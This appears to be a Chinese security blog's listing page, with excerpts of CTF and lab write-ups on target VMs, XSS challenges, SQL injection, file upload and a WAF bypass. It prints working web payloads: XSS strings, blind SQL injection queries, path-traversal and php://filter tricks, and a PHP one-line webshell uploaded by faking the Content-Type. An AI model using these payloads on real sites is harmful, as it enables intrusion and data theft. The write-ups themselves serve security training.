cengbox3_靶机渗透 未曾设想的道路这个靶机做起来问题挺多的,可能是我用的VMware的缘故。最终也没做到最后开局arpscan,nmap各种方式扫了一圈都未能成功获取到靶机IP。通过救援模式进入shell修改网卡配置解决。具体可以参考链接,改完之后虚拟机也要重启一次,才能正常使用,信息收集nmap先扫一波开放端口nmap -sV 192.168.218.130 -p 1-65535Host is up (0.00064s latency).Not shown: 997 filtered ports
关于php异或的脚本 最近做了道使用异或绕过preg_match()的题,正则的要求是没有字母数字。网上翻文章,搜集了两个脚本#朋友给的,也不知道最早是哪个师傅写的def encode(command): code = "~`!@#$%&*()-=+_[]{};:<>,.?/|" result_1 = "" result_2 = "" for x in command: if not command.isalpha(): r
阿里云部署metasploit framework 前言算记录一个小坑吧正文msf官网上在Linux上部署的命令是这样curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&...
Imperva WAF Bypass【翻译】 原文链接前前言投稿被拒,发自己博客吧,就当提高英语水平了前言描述了我是如何绕过Imperva WAF触发XSS,并与两方沟通处理漏洞的故事正文这是个关于一个流行的英国连锁餐厅网站上的XSS漏洞的故事,这家连锁餐厅,我简单地称之为某餐厅(Shenanigan's)。事实上,有趣的事情不仅是这个XSS漏洞本身,绕过WAF的过程同样有趣。让我们从 开始我坐在办公室里查看某...
xss挑战 xss挑战https://xss.haozi.me GitHub的issues里有题解0x00<script>alert(1)</script>0x01闭合标签</textarea><script>alert(1)</script>0x02"><script>alert(1)</script&g...
布尔盲注脚本-sqlilabs-less6 写这个起因是用sqlmap跑完,从日志里看它payload想自己复现一下。不过sqlmap好像并没有识别数据库名的长度,而是直接从第一位开始判断。也可能它payload混在了前面识别类型的里面我没注意。判断库名的部分payload如下ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64#ID:1" ...
i春秋练习——第三届“百越杯”福建省高校网络空间安全大赛-web-do you know upload 首先是一个文件上传,比较基础。选择上传111.php,内容是一句话马<?php eval($_POST['cmd']);?>burpsuit抓包修改Content-Type为image/gif(任一种图片都行),这类漏洞可以搭建一个upload-lab本地练一练。显示上传成功接下来使用蚁剑连接,连接密码就是之前一句话写的cmd,编码器可以选default,这题没...
BUUCTF-easy_tornado 这题是2018护网杯原题的复现。进去之后显示三个txt,每个点进去看看。内容如下:/flag.txtflag in /fllllllllllllag/welcome.txtrender/hints.txtmd5(cookie_secret+md5(filename))看看url,发现web9.buuoj.cn/file?filename=/flag.txt&fil...
BUUCTF-强网杯-随便注 引用:https://www.cnblogs.com/Mikasa-Ackerman/p/11050033.html1‘ //首先尝试的加引号,报错了1’ # //正常1‘ order by 1 # //用order by 测试得到列数为21' union select 1,2 # //回显了过滤规则 return preg_match("/select|update|delete|d...
iscc2019 iscc2019miscwelcome加上后缀zip,打开将“蓅烺計劃 洮蓠朩暒”替换为0,“戶囗 萇條”替换为1。得到二进制串01100110011011000110000101100111011110110100100101010011010000110100001101011111010101110100010101001100010000110100111101001101010...
python实现的网站目录扫描器 import optparseimport requestsfrom multiprocessing.dummy import Pool as ThreadPool #pool表示线程池#参数设置def get_args(): usage="-u <target url> --level <rank for scan> -d <dict...
hgame week4-writeup week4-writeupwuerrorwebhappy python{u’csrf_token’: u’a844480fd5e2cd4c8e3107765aa25923572cd2df’, u’_fresh’: True, u’user_id’: u’admin’, u’_id’: u’051101fca32cbd279dfd6e96892ec55881e06fcb6a52872d04c...
hgame week3 week3-wpwuerrorweb1.sqli-1首先写个脚本过codeimport hashlibfrom multiprocessing.dummy import Pool as ThreadPool# MD5截断数值已知 求原始数据# 例子 substr(md5(captcha), 0, 6)=60b7ef|| substr(md5($_GET["code"]),0,4)...
hgameweek2-wp week2-wpwuerrorwebeasy php使用…/./来绕过str_replace(`'../', '', $img`)?img=…/./flag可以得到回显maybe_you_should_think_think再想想,试试伪协议读取文件看看伪协议:?img=php://filter/read=convert.base64-encode/resource=…/...
hgame第一周wp Write up----wuerrorWeb(1)谁吃了我的flag根据hint,推测是未正常关闭的vim备份文件泄露访问:http://118.25.111.31:10086/.index.html.swp下载该文件,使用vim -r .index.html.swp恢复得到flag(2)换头大作战随便输入一个值,回显:request method is error.I thin...
bugkuctf-分析-菜刀 1.打开下载的压缩包,里面是个pcapng文件。用wireshark打开。先看看http包比较少而且info里也没什么特别的信息,每个点开看看在第四个包里发现了一句话,重点来了!看下一个包,他做了什么。选中第五个包,右键选择追踪HTTP流base64解码$xx(' ')引号内的内容发现他尝试读取flag.tar.gz文件,且在头尾输出了X@Y.接着看第六个H...
记docker复现CTF题的一次流程 我使用的虚拟机是18.04Ubuntu1.安装docker,这一步挺多教程的,就不详细说了。2.在菜鸟课程学习了一下docker的基础教程。几个常用到的命令:(1)docker image 查看本地的docker镜像(2)docker ps 查看正在运行的docker(3)docker run [options] image [command] [arg...]用到的...